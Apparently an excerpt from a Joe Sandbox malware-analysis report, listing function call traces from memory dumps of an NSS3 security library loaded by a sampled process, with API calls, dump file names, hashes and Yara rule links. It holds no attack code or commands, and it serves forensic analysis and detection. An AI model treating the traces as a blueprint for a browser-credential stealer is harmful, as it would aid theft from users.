                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47AF37
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3714604333-0
                                                                                                                                                                                                                                                      • Opcode ID: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                                                      • Instruction ID: 20fdc0824170a401db236edcbb287b091fab19a9af12f6a45205b45adc2dd042
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE2128729092009BEB20CE189C01F9A7BA4AF85728F144319EC589B791E732D90587B7
                                                                                                                                                                                                                                                      Function 6C4FEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(FA71756D,?), ref: 6C4FEEAE
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4FEEC5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • htonl.WSOCK32(?), ref: 6C4FEEE3
                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?), ref: 6C4FEEED
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C4FEF01
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1351805024-0
                                                                                                                                                                                                                                                      • Opcode ID: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                                                      • Instruction ID: 1302c93ff6b1680c7aef7fe43cc51715aa8d106401f163ad40432445739cef57
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21B131A00224ABDB10DF28DC84F9A77A4EF85359F158129EC299B741E330ED16CBE6
                                                                                                                                                                                                                                                      Function 6C477F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C477F68
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C477F7B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477FA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59919C,?), ref: 6C477FBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477FCA
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C59915C,00000014), ref: 6C477FFE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1489184013-0
                                                                                                                                                                                                                                                      • Opcode ID: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                                                      • Instruction ID: 02a647034d3a15237846ff093a676da9453b046391db2a91415908ce3a02ff0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B11121B1E042046AF720EA25AE50FBB76B8DF4465CF40062DEC59D2B81F720A948C2F2
                                                                                                                                                                                                                                                      Function 6C47BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,6C4FDC29,?), ref: 6C47BE64
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C4FDC29,?), ref: 6C47BE78
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C4FDC29,?), ref: 6C47BE96
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C4FDC29,?), ref: 6C47BEBB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6C4FDC29,?), ref: 6C47BEDF
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C4FDC29,?), ref: 6C47BEF3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3111646008-0
                                                                                                                                                                                                                                                      • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                      • Instruction ID: b0811d20015fc1c628524bf971bcb1ecee4f7e14a2e3aa950b8a0cc3e997aafb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11A272E012055BEB10DB659D55FAA3BA8EB41259F154028ED09EBB80EB31E909C7F1
                                                                                                                                                                                                                                                      Function 6C4B9850 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B985B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C4B9871
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C59D9B0,?), ref: 6C4B98A2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CE245
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4CE254
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4B98B7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4B9901
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4B9910
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2561846027-0
                                                                                                                                                                                                                                                      • Opcode ID: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                                                      • Instruction ID: 70068e6b0163237e3f40caaa0eafbf4ddc911de95a7084ff705232e9ddfeda8c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C110272A0124477FF00DE609C81FAA3A78AB653A9F150224FD1869791E773D8A483A1
                                                                                                                                                                                                                                                      Function 6C503C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C503D3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_NewArena_Util.NSS3(00000800,6C503CAF,?), ref: 6C47BABF
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C503CAF,?), ref: 6C47BAD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C503CAF,?), ref: 6C47BB08
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C503CAF,?), ref: 6C47BB1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C503CAF,?), ref: 6C47BB3B
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503CCB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C503CE2
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C503CF8
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503D15
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C503D2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4030862364-0
                                                                                                                                                                                                                                                      • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                      • Instruction ID: 69067ddd7e9b3e7ec47dc2e2c8469aad466ed2034e886c524c78884ea3680f4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D811C4B6B50600AFE7209A65EC41F9BB3E5AF51248F504538E81ADBB20F632F919C652
                                                                                                                                                                                                                                                      Function 6C4CFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 660648399-0
                                                                                                                                                                                                                                                      • Opcode ID: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                                                      • Instruction ID: 00417055491a8b5125191b0d476d1f8975d295cfed122c0fdebd98708e970416
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 661100BA7026056BFB00DF55DC40E5B77A4AF54259F158038ED1C87B22E735E914C7D2
                                                                                                                                                                                                                                                      Function 6C57FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C57FD9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6C57FDB9
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C57FDD4
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C57FDF2
